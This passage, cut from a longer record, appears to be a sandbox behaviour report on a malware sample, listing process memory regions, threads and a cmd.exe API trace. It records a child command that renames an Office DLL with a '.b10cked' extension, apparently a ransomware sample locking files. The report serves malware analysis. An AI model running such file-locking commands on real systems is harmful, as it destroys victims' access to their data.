region_type = private name = "private_0x000000007ffaa000" filename = "" Region: id = 23343 start_va = 0x7ffab000 end_va = 0x7ffabfff entry_point = 0x0 region_type = private name = "private_0x000000007ffab000" filename = "" Region: id = 23344 start_va = 0x7ffac000 end_va = 0x7ffacfff entry_point = 0x0 region_type = private name = "private_0x000000007ffac000" filename = "" Region: id = 23345 start_va = 0x7ffad000 end_va = 0x7ffadfff entry_point = 0x0 region_type = private name = "private_0x000000007ffad000" filename = "" Region: id = 23346 start_va = 0x7ffae000 end_va = 0x7ffaefff entry_point = 0x0 region_type = private name = "private_0x000000007ffae000" filename = "" Region: id = 23347 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 23348 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 23349 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 23350 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 23351 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 23352 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 23353 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 23354 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 23355 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 23356 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 23357 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 23358 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 27850 start_va = 0x1860000 end_va = 0x189ffff entry_point = 0x0 region_type = private name = "private_0x0000000001860000" filename = "" Region: id = 27851 start_va = 0x6bec0000 end_va = 0x6bff2fff entry_point = 0x6bec0000 region_type = mapped_file name = "msxml3.dll" filename = "\\Windows\\System32\\msxml3.dll" (normalized: "c:\\windows\\system32\\msxml3.dll") Region: id = 27852 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 27887 start_va = 0x9f0000 end_va = 0x9f0fff entry_point = 0x9f0000 region_type = mapped_file name = "msxml3r.dll" filename = "\\Windows\\System32\\msxml3r.dll" (normalized: "c:\\windows\\system32\\msxml3r.dll") Region: id = 27888 start_va = 0xa00000 end_va = 0xa1ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a00000" filename = "" Region: id = 27889 start_va = 0x6310000 end_va = 0x634ffff entry_point = 0x0 region_type = private name = "private_0x0000000006310000" filename = "" Region: id = 27890 start_va = 0x6480000 end_va = 0x64bffff entry_point = 0x0 region_type = private name = "private_0x0000000006480000" filename = "" Region: id = 27891 start_va = 0x6650000 end_va = 0x668ffff entry_point = 0x0 region_type = private name = "private_0x0000000006650000" filename = "" Region: id = 27892 start_va = 0x6690000 end_va = 0x6a8ffff entry_point = 0x0 region_type = private name = "private_0x0000000006690000" filename = "" Region: id = 27893 start_va = 0x6f290000 end_va = 0x6f2f0fff entry_point = 0x6f290000 region_type = mapped_file name = "wer.dll" filename = "\\Windows\\System32\\wer.dll" (normalized: "c:\\windows\\system32\\wer.dll") Region: id = 36173 start_va = 0xa80000 end_va = 0xa82fff entry_point = 0xa80000 region_type = mapped_file name = "wuaueng.dll.mui" filename = "\\Windows\\System32\\en-US\\wuaueng.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wuaueng.dll.mui") Region: id = 36174 start_va = 0xa90000 end_va = 0xa9ffff entry_point = 0xa90000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 36175 start_va = 0xaa0000 end_va = 0xaa0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000aa0000" filename = "" Region: id = 36176 start_va = 0xab0000 end_va = 0xabffff entry_point = 0xab0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 36177 start_va = 0x1520000 end_va = 0x155ffff entry_point = 0x0 region_type = private name = "private_0x0000000001520000" filename = "" Region: id = 36178 start_va = 0x1990000 end_va = 0x19cffff entry_point = 0x0 region_type = private name = "private_0x0000000001990000" filename = "" Region: id = 36179 start_va = 0x19e0000 end_va = 0x1a1ffff entry_point = 0x0 region_type = private name = "private_0x00000000019e0000" filename = "" Region: id = 36180 start_va = 0x1ba0000 end_va = 0x1bdffff entry_point = 0x0 region_type = private name = "private_0x0000000001ba0000" filename = "" Region: id = 36181 start_va = 0x1f50000 end_va = 0x1f8ffff entry_point = 0x0 region_type = private name = "private_0x0000000001f50000" filename = "" Region: id = 36182 start_va = 0x1fd0000 end_va = 0x200ffff entry_point = 0x0 region_type = private name = "private_0x0000000001fd0000" filename = "" Region: id = 36183 start_va = 0x4120000 end_va = 0x415ffff entry_point = 0x0 region_type = private name = "private_0x0000000004120000" filename = "" Region: id = 36184 start_va = 0x6a90000 end_va = 0x6c8ffff entry_point = 0x0 region_type = private name = "private_0x0000000006a90000" filename = "" Region: id = 36185 start_va = 0x724e0000 end_va = 0x72504fff entry_point = 0x724e0000 region_type = mapped_file name = "cscobj.dll" filename = "\\Windows\\System32\\cscobj.dll" (normalized: "c:\\windows\\system32\\cscobj.dll") Region: id = 36186 start_va = 0x7ffa1000 end_va = 0x7ffa1fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa1000" filename = "" Region: id = 36187 start_va = 0x7ffa4000 end_va = 0x7ffa4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa4000" filename = "" Region: id = 36188 start_va = 0x7ffa8000 end_va = 0x7ffa8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa8000" filename = "" Region: id = 36189 start_va = 0x7ffaf000 end_va = 0x7ffaffff entry_point = 0x0 region_type = private name = "private_0x000000007ffaf000" filename = "" Region: id = 36190 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Thread: id = 366 os_tid = 0xf0c Thread: id = 367 os_tid = 0xc80 Thread: id = 368 os_tid = 0xa28 Thread: id = 369 os_tid = 0x8e0 Thread: id = 370 os_tid = 0x8dc Thread: id = 371 os_tid = 0x8d8 Thread: id = 372 os_tid = 0x8c8 Thread: id = 373 os_tid = 0x7e0 Thread: id = 374 os_tid = 0x7c8 Thread: id = 375 os_tid = 0x534 Thread: id = 376 os_tid = 0x7d8 Thread: id = 377 os_tid = 0x764 Thread: id = 378 os_tid = 0x75c Thread: id = 379 os_tid = 0x750 Thread: id = 380 os_tid = 0x714 Thread: id = 381 os_tid = 0x710 Thread: id = 382 os_tid = 0x680 Thread: id = 383 os_tid = 0x4cc Thread: id = 384 os_tid = 0x4ac Thread: id = 385 os_tid = 0x498 Thread: id = 386 os_tid = 0x4a8 Thread: id = 387 os_tid = 0x484 Thread: id = 388 os_tid = 0x478 Thread: id = 389 os_tid = 0x470 Thread: id = 390 os_tid = 0x3f4 Thread: id = 391 os_tid = 0x3e4 Thread: id = 392 os_tid = 0x3d8 Thread: id = 393 os_tid = 0x388 Thread: id = 394 os_tid = 0x378 Thread: id = 395 os_tid = 0x374 Thread: id = 396 os_tid = 0x364 Thread: id = 397 os_tid = 0x35c Thread: id = 402 os_tid = 0x998 Thread: id = 403 os_tid = 0xb80 Thread: id = 613 os_tid = 0xb50 Thread: id = 615 os_tid = 0x99c Thread: id = 616 os_tid = 0x988 Thread: id = 617 os_tid = 0xae8 Thread: id = 666 os_tid = 0x51c Thread: id = 806 os_tid = 0x3dc Thread: id = 827 os_tid = 0xfa4 Thread: id = 829 os_tid = 0xa08 Thread: id = 851 os_tid = 0x88c Thread: id = 852 os_tid = 0x80c Thread: id = 934 os_tid = 0x448 Thread: id = 935 os_tid = 0x3c4 Thread: id = 936 os_tid = 0xfe4 Thread: id = 952 os_tid = 0xf44 Process: id = "299" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16180" os_pid = "0xa7c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUB6IN~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUB6INTL.DLL.trx_dll.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 23419 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 23420 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 23421 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 23422 start_va = 0x1f0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 23423 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 23424 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 23425 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 23426 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 23427 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 23428 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 23600 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 23601 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 23602 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 23603 start_va = 0x480000 end_va = 0x57ffff entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 23604 start_va = 0x740000 end_va = 0x74ffff entry_point = 0x0 region_type = private name = "private_0x0000000000740000" filename = "" Region: id = 23605 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 23606 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 23607 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 23608 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 23609 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 23610 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 23611 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 23612 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 23613 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 23614 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 23615 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 23616 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 23617 start_va = 0x190000 end_va = 0x196fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 23618 start_va = 0x1a0000 end_va = 0x1a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 23619 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 23620 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 23621 start_va = 0x2f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 23622 start_va = 0x580000 end_va = 0x6e2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 23623 start_va = 0x750000 end_va = 0x134ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000750000" filename = "" Thread: id = 398 os_tid = 0x858 [0172.983] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2efc54 | out: lpSystemTimeAsFileTime=0x2efc54*(dwLowDateTime=0x9cffaf80, dwHighDateTime=0x1d440a9)) [0172.983] GetCurrentProcessId () returned 0xa7c [0172.983] GetCurrentThreadId () returned 0x858 [0172.983] GetTickCount () returned 0x32625 [0172.983] QueryPerformanceCounter (in: lpPerformanceCount=0x2efc4c | out: lpPerformanceCount=0x2efc4c*=22977261650) returned 1 [0172.984] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0172.984] __set_app_type (_Type=0x1) [0172.984] __p__fmode () returned 0x76b331f4 [0172.984] __p__commode () returned 0x76b331fc [0172.984] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0172.984] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0172.985] GetCurrentThreadId () returned 0x858 [0172.985] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x858) returned 0x38 [0172.985] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0172.985] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0172.985] SetThreadUILanguage (LangId=0x0) returned 0x409 [0172.985] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0172.985] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2efbe4 | out: phkResult=0x2efbe4*=0x0) returned 0x2 [0172.985] VirtualQuery (in: lpAddress=0x2efc1b, lpBuffer=0x2efbb4, dwLength=0x1c | out: lpBuffer=0x2efbb4*(BaseAddress=0x2ef000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0172.985] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x2efbb4, dwLength=0x1c | out: lpBuffer=0x2efbb4*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0172.985] VirtualQuery (in: lpAddress=0x1f1000, lpBuffer=0x2efbb4, dwLength=0x1c | out: lpBuffer=0x2efbb4*(BaseAddress=0x1f1000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0172.985] VirtualQuery (in: lpAddress=0x1f3000, lpBuffer=0x2efbb4, dwLength=0x1c | out: lpBuffer=0x2efbb4*(BaseAddress=0x1f3000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0172.985] VirtualQuery (in: lpAddress=0x2f0000, lpBuffer=0x2efbb4, dwLength=0x1c | out: lpBuffer=0x2efbb4*(BaseAddress=0x2f0000, AllocationBase=0x2f0000, AllocationProtect=0x2, RegionSize=0x101000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0172.985] GetConsoleOutputCP () returned 0x1b5 [0172.985] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0172.985] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0172.985] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.985] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0172.986] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.986] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0172.986] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.986] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0172.986] _get_osfhandle (_FileHandle=0) returned 0x3 [0172.986] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0172.986] _get_osfhandle (_FileHandle=0) returned 0x3 [0172.986] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0172.986] GetEnvironmentStringsW () returned 0x490210* [0172.986] FreeEnvironmentStringsW (penv=0x490210) returned 1 [0172.987] GetEnvironmentStringsW () returned 0x490210* [0172.987] FreeEnvironmentStringsW (penv=0x490210) returned 1 [0172.987] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2eeb54 | out: phkResult=0x2eeb54*=0x40) returned 0x0 [0172.987] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2eeb5c, lpData=0x2eeb60, lpcbData=0x2eeb58*=0x1000 | out: lpType=0x2eeb5c*=0x0, lpData=0x2eeb60*=0xa0, lpcbData=0x2eeb58*=0x1000) returned 0x2 [0172.987] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2eeb5c, lpData=0x2eeb60, lpcbData=0x2eeb58*=0x1000 | out: lpType=0x2eeb5c*=0x4, lpData=0x2eeb60*=0x1, lpcbData=0x2eeb58*=0x4) returned 0x0 [0172.987] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2eeb5c, lpData=0x2eeb60, lpcbData=0x2eeb58*=0x1000 | out: lpType=0x2eeb5c*=0x0, lpData=0x2eeb60*=0x1, lpcbData=0x2eeb58*=0x1000) returned 0x2 [0172.987] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2eeb5c, lpData=0x2eeb60, lpcbData=0x2eeb58*=0x1000 | out: lpType=0x2eeb5c*=0x4, lpData=0x2eeb60*=0x0, lpcbData=0x2eeb58*=0x4) returned 0x0 [0172.987] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2eeb5c, lpData=0x2eeb60, lpcbData=0x2eeb58*=0x1000 | out: lpType=0x2eeb5c*=0x4, lpData=0x2eeb60*=0x40, lpcbData=0x2eeb58*=0x4) returned 0x0 [0172.987] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2eeb5c, lpData=0x2eeb60, lpcbData=0x2eeb58*=0x1000 | out: lpType=0x2eeb5c*=0x4, lpData=0x2eeb60*=0x40, lpcbData=0x2eeb58*=0x4) returned 0x0 [0172.987] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2eeb5c, lpData=0x2eeb60, lpcbData=0x2eeb58*=0x1000 | out: lpType=0x2eeb5c*=0x0, lpData=0x2eeb60*=0x40, lpcbData=0x2eeb58*=0x1000) returned 0x2 [0172.987] RegCloseKey (hKey=0x40) returned 0x0 [0172.987] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2eeb54 | out: phkResult=0x2eeb54*=0x40) returned 0x0 [0172.987] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2eeb5c, lpData=0x2eeb60, lpcbData=0x2eeb58*=0x1000 | out: lpType=0x2eeb5c*=0x0, lpData=0x2eeb60*=0x40, lpcbData=0x2eeb58*=0x1000) returned 0x2 [0172.987] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2eeb5c, lpData=0x2eeb60, lpcbData=0x2eeb58*=0x1000 | out: lpType=0x2eeb5c*=0x4, lpData=0x2eeb60*=0x1, lpcbData=0x2eeb58*=0x4) returned 0x0 [0172.987] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2eeb5c, lpData=0x2eeb60, lpcbData=0x2eeb58*=0x1000 | out: lpType=0x2eeb5c*=0x0, lpData=0x2eeb60*=0x1, lpcbData=0x2eeb58*=0x1000) returned 0x2 [0172.987] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2eeb5c, lpData=0x2eeb60, lpcbData=0x2eeb58*=0x1000 | out: lpType=0x2eeb5c*=0x4, lpData=0x2eeb60*=0x0, lpcbData=0x2eeb58*=0x4) returned 0x0 [0172.987] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2eeb5c, lpData=0x2eeb60, lpcbData=0x2eeb58*=0x1000 | out: lpType=0x2eeb5c*=0x4, lpData=0x2eeb60*=0x9, lpcbData=0x2eeb58*=0x4) returned 0x0 [0172.987] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2eeb5c, lpData=0x2eeb60, lpcbData=0x2eeb58*=0x1000 | out: lpType=0x2eeb5c*=0x4, lpData=0x2eeb60*=0x9, lpcbData=0x2eeb58*=0x4) returned 0x0 [0172.987] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2eeb5c, lpData=0x2eeb60, lpcbData=0x2eeb58*=0x1000 | out: lpType=0x2eeb5c*=0x0, lpData=0x2eeb60*=0x9, lpcbData=0x2eeb58*=0x1000) returned 0x2 [0172.987] RegCloseKey (hKey=0x40) returned 0x0 [0172.987] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886388 [0172.987] srand (_Seed=0x5b886388) [0172.988] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUB6IN~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUB6INTL.DLL.trx_dll.b10cked\"" [0172.988] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUB6IN~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUB6INTL.DLL.trx_dll.b10cked\"" [0172.988] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0172.988] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x491970, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0172.988] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0172.988] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0172.988] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0172.988] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0172.988] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0172.988] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0172.988] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0172.988] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0172.988] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0172.988] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0172.988] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0172.988] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0172.989] GetEnvironmentStringsW () returned 0x492360* [0172.989] FreeEnvironmentStringsW (penv=0x492360) returned 1 [0172.989] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0172.989] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0172.989] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0172.989] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0172.989] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0172.989] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0172.989] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0172.989] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0172.989] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0172.989] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0172.989] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2ef920 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0172.989] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", 